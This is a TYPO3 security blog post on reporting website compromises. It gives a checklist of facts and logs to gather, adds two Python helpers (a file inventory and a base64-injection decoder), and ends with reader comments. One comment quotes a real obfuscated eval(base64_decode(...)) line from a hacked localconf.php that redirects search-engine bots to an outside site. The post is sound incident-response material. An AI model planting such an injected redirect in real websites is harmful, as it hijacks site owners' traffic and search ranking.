How not to report a security incident

Posted on May 14, 2009 by Marcus.

Have a look, I got hacked.

Your TYPO3 website has been hacked and you need quick help? Well, then help us too.

A report like the following reached the TYPO3 Security Team:

Hi guys,
have a look at http://example.org/path/to/website/defacement/, I got hacked.

I hope you see what's wrong here. There's no additional information. This guy is only reporting the impact of a hack. There's no way to help you with this information; furthermore, such a report doesn't help the TYPO3 community either, as our team is unable to analyze it.


The right way:

In short, collect as much information as possible!


In detail:

  • What happened?
    What's the impact of the hack? Defacement; your website suddenly delivers malware; there's a new backend user "blackhat"?
  • When did it happen?
    When did you recognize the hack? From the logfiles, when do you estimate the attacker succeeded?
  • How did you become aware of the hack?
    Your clients reported malware on your site? You came to your website from Google and it looked different (with all those links to vi**ra pills)?
  • Where did it happen?
    On a dedicated server (root server, virtual server) or on virtual hosting shared with other customers of the hosting provider; is there any other software installed that might be vulnerable?
  • Strange data or behaviour?
    Different website output when accessing the website directly (through a bookmark) versus via a referrer (directed from a search engine); new files unrelated to TYPO3 (webshell.pl)?
  • What kind of software is installed?
    TYPO3 version, list of installed extensions with version numbers (are they up to date); is your server up to date with all those TYPO3 Security advisories?
  • Is your local client safe?
    Did you check your local client with at least two different malware scanners; did you recently access your website via an insecure wireless LAN; how do you transfer data to your server (insecure FTP, or SFTP/SCP)?


Data you should collect, and that we are interested in:
TYPO3 sys_log table entries, web server access logs, PHP error logs, mod_security logs, a list of unexpected files or files with a strange access/modification time, OS logs (auth, audit, messages, secure), IDS logs, AIDE/Tripwire reports
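One piece of this list that is easy to automate is the inventory of files with a strange modification time and of files that do not belong in a TYPO3 web root. The script below is an added example, not code from this post or from the TYPO3 project: it walks a document root, reports every file modified after a cut-off time (for instance the moment you believe the attacker got in) and every file whose extension is not expected in a TYPO3 installation. The expected-extension list and the sample directory tree are assumptions; the sample tree is constructed in a temporary directory so the script runs offline.

```python
"""Inventory a TYPO3 document root for an incident report.

Added example, not part of the original post or of TYPO3. Run it against a
local copy (or read-only mount) of the web root; the extension list below is
an assumption and should be adapted to the installation.
"""
import os
import shutil
import tempfile
import time
from datetime import datetime, timezone

# File types normally present in a TYPO3 web root (assumption; extend as needed).
EXPECTED_EXT = {".php", ".inc", ".html", ".htm", ".txt", ".xml", ".css", ".js",
                ".gif", ".jpg", ".jpeg", ".png", ".ico", ".svg", ".tmpl", ".sql"}


def inventory(root, since_epoch):
    """Walk `root` and return files modified after `since_epoch` (oldest first)
    plus files whose extension is unexpected for a TYPO3 web root."""
    modified, unexpected = [], []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: do not follow planted symlinks
            except OSError:
                continue
            rel = os.path.relpath(path, root)
            ext = os.path.splitext(name)[1].lower()
            if st.st_mtime > since_epoch:
                modified.append((rel, st.st_mtime))
            if ext and ext not in EXPECTED_EXT:
                unexpected.append(rel)
    modified.sort(key=lambda item: item[1])
    return {"modified": modified, "unexpected": sorted(unexpected)}


def format_report(inv):
    """Render the inventory as text that can be pasted into the report."""
    lines = ["Files modified after the cut-off (oldest first):"]
    for rel, mtime in inv["modified"]:
        stamp = datetime.fromtimestamp(mtime, timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
        lines.append(f"  {stamp}  {rel}")
    lines.append("Files with extensions unexpected in a TYPO3 web root:")
    lines.extend(f"  {rel}" for rel in inv["unexpected"])
    return "\n".join(lines)


def build_sample_root():
    """Create a constructed sample web root in a temp directory (demo only) and
    return (root, since_epoch): two files dated a week before the cut-off and
    two files touched after it."""
    root = tempfile.mkdtemp(prefix="typo3root-")
    since = time.time() - 24 * 3600            # cut-off: "since yesterday"
    old = since - 7 * 24 * 3600
    samples = {
        "index.php": old,
        "typo3conf/ext/news/ext_emconf.php": old,
        "typo3conf/localconf.php": since + 3600,   # edited after the cut-off
        "fileadmin/webshell.pl": since + 7200,     # file type unexpected in TYPO3
    }
    for rel, mtime in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write("<?php // constructed sample file\n")
        os.utime(path, (mtime, mtime))
    return root, since


if __name__ == "__main__":
    sample_root, cutoff = build_sample_root()
    try:
        print(format_report(inventory(sample_root, cutoff)))
    finally:
        shutil.rmtree(sample_root)
```

Modification times are only as trustworthy as the attacker allowed them to be (touch(1) resets them), so treat the output as a starting point and cross-check it against the access logs and an AIDE/Tripwire baseline where one exists.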


Bonus:
You have already analyzed the complete hack and are now able to report the attacker's exact entry point. Great, your place in the top ten of "best vulnerability reports" is guaranteed. But we're sorry, the first rank has already been taken! ;-)

2 Comments

web

typo3 4.0.2
localconf.php contains text:

echo ".eval(base64_decode('JGFnZW50ID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOyBpZiAoZXJlZ2koImdvb2dsZSIs
JGFnZW50KXxlcmVnaSgic2x1cnAiLCAkYWdlbnQpfGVyZWdpKCJtc24iLCAkYWdlbnQpKSB7aGVh
ZGVyKCJIVFRQLzEuMSAzMDEiKTsgaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3AxcDMubmV0LyIp
OyBleGl0KCk7IH0=')).";

which evaluates to a script redirecting search bots to other sites.

The access to the server and backend seems to be secure.

Please let me know how this may have happened.

by Danylo Kozub on October 29, 2009
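The injected line in this comment is the classic eval(base64_decode('...')) pattern, and the first thing a defender wants for the report is what the blob actually does. The script below is an added example, not code from the commenter, the blog or the TYPO3 project: it scans a PHP file for that pattern (tolerating a blob wrapped over several lines, as in the comment), decodes it, and names the behaviours it exhibits and the URLs it contains. The sample localconf.php is constructed; its payload mirrors the behaviour described above (redirecting search bots) but points at a placeholder domain, and the indicator list is an assumption rather than a complete signature set.

```python
"""Find and decode eval(base64_decode(...)) injections in a PHP config file.

Added example, not from the original post, its comments or TYPO3. The sample
localconf.php is constructed and its redirect target is a placeholder.
"""
import base64
import re
import textwrap

# eval(base64_decode('...')) with the base64 blob possibly wrapped across lines.
OBFUSCATED = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)",
    re.IGNORECASE)

# Behaviours worth naming in a report (assumed list, not exhaustive).
INDICATORS = [
    ("reads User-Agent", re.compile(r"HTTP_USER_AGENT")),
    ("targets search-engine bots", re.compile(r"google|slurp|msn|bing|yahoo", re.I)),
    ("issues HTTP redirect", re.compile(r"header\s*\(\s*['\"]Location:", re.I)),
    ("fetches remote content", re.compile(r"curl_|file_get_contents|fsockopen", re.I)),
    ("executes system commands",
     re.compile(r"\b(system|exec|shell_exec|passthru|popen)\s*\(", re.I)),
]
URL = re.compile(r"https?://[^\s'\"()]+")


def scan_php(source):
    """Return one finding per injected eval(base64_decode(...)) in `source`:
    the line it sits on, the decoded payload (None if the blob is not valid
    base64), the behaviour indicators it matches and the URLs it contains."""
    findings = []
    for m in OBFUSCATED.finditer(source):
        blob = re.sub(r"\s+", "", m.group(1))       # undo line wrapping
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:                           # binascii.Error is a ValueError
            decoded = None
        findings.append({
            "line": source.count("\n", 0, m.start()) + 1,
            "decoded": decoded,
            "indicators": [name for name, rx in INDICATORS if decoded and rx.search(decoded)],
            "urls": URL.findall(decoded) if decoded else [],
        })
    return findings


# Constructed payload: same behaviour as the one in the comment (redirect search
# bots), with a placeholder target instead of the real attacker domain.
SAMPLE_PAYLOAD = ("$agent = $_SERVER['HTTP_USER_AGENT']; "
                  "if (eregi(\"google\", $agent) || eregi(\"slurp\", $agent)) "
                  "{ header(\"Location: http://redirect.example.invalid/\"); exit(); }")
_blob = "\n".join(textwrap.wrap(base64.b64encode(SAMPLE_PAYLOAD.encode()).decode(), 76))
SAMPLE_LOCALCONF = (
    "<?php\n"
    "$TYPO3_CONF_VARS['SYS']['sitename'] = 'Example site';\n"
    "$typo_db_username = 'typo3';\n"
    "eval(base64_decode('" + _blob + "'));\n"
    "?>\n"
)


if __name__ == "__main__":
    for finding in scan_php(SAMPLE_LOCALCONF):
        print(f"line {finding['line']}: {', '.join(finding['indicators']) or 'no indicator'}")
        print("  urls:", finding["urls"])
        print("  decoded:", finding["decoded"])
```

Run it over typo3conf/localconf.php and any other writable PHP file the attacker could reach; the decoded payload and the URLs go into the report alongside the file's modification time from the access and sys_log data.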

Re: web

If you're really using TYPO3 version 4.0.2, you've missed several updates, also those that fix known vulnerabilities.
The latest (and last) version of the 4.0 branch is version 4.0.13.

One vulnerability (see advisory TYPO3-SA-2009-002: http://typo3.org/teams/security/security-bulletins/typo3-sa-2009-002/) allowed remote users to write to the localconf.php file.

So my advice is to update to 4.0.13.

Let me add that branch 4.0 has reached end of support, and branch 4.1 will reach end of support in November 2009.

Better upgrade to TYPO3 version 4.2.10 (http://typo3.org/download/packages/) as soon as possible!

by Marcus on November 02, 2009
